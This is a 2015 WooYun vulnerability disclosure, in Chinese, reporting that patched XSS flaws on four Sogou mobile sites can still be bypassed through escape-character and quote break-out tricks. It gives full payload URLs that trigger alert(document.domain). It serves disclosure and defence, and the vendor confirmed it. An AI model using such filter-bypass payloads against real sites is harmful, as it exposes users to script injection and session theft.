当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112836

漏洞标题:搜狗多处已修补XSS漏洞均可被绕过

相关厂商:搜狗

漏洞作者: izy

提交时间:2015-05-08 16:00

修复时间:2015-06-26 20:22

公开时间:2015-06-26 20:22

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-08: 细节已通知厂商并且等待厂商处理中
2015-05-12: 厂商已经确认,细节仅向厂商公开
2015-05-22: 细节向核心白帽子及相关领域专家公开
2015-06-01: 细节向普通白帽子公开
2015-06-11: 细节向实习白帽子公开
2015-06-26: 细节向公众公开

简要描述:

这就是指哪修哪的坏处....本来还想挖挖搜狗浏览器的T_T

详细说明:

1.http://wap.sogou.com
http://wap.sogou.com/web/searchList.jsp
当搜索11111111"'<> 有这么一出输出:将'转义为\'

屏幕快照 2015-05-08 下午12.16.31.png


而我们提交\'

屏幕快照 2015-05-08 下午12.18.11.png


变成\\' 成功逃脱'的限制
payload:http://wap.sogou.com/web/searchList.jsp?uID=VxJn8XT7ZWCaznT5&v=5&w=1278&t=1431058749585&s_t=1431058756606&keyword=\%27%3Balert%28document.domain%29%3B%3C!--&pg=webSearchList&s=

屏幕快照 2015-05-08 下午12.20.19.png


2.wap.gouwu.sogou.com
WooYun: 搜狗购物存在xss漏洞
应该是<>被过滤了,'被转义,而"却没做处理
找到一个输出点,提交11"}');alert();//
发现'被转义不能逃脱限制

屏幕快照 2015-05-08 下午12.28.53.png


结果发现到这输出了..

({oquery:""});alert(document.domain);//",desc:{attrid:0,attrtype:1,attrname:2},chosen:[],hot:[]})


屏幕快照 2015-05-08 下午12.39.11.png


payload:http://wap.gouwu.sogou.com/search#shop/query=1"});alert(document.domain);//&sourceid=sr_tbtn&ie=utf-8
3.http://map.sogou.com
WooYun: 搜狗某处XSS
官方修复是过滤<>,而不管" '
payload:
http://map.sogou.com/store/nanchong+n=0;%20url=data:text/html,%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%20http-equiv=%22refresh%22%20xxx=%22#hb=0,1&c=11809562.50000009,3584875,12
4.http://m.sogou.com/
http://m.sogou.com/web/searchList.jsp?uID=VxJn8XT7ZWCaznT5&v=5&w=1274&t=1431060287847&s_t=1431060291268&keyword=2\%27;alert%28document.domain%29;%3C!--&pg=webSearchList

屏幕快照 2015-05-08 下午12.48.08.png


类似的漏洞肯定还有很多..慢慢排查吧~

漏洞证明:

屏幕快照 2015-05-08 下午12.48.08.png

修复方案:

过滤

版权声明:转载请注明来源 izy@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2015-05-12 20:20

厂商回复:

感谢支持!欢迎到SGSRC提交漏洞!

最新状态:

暂无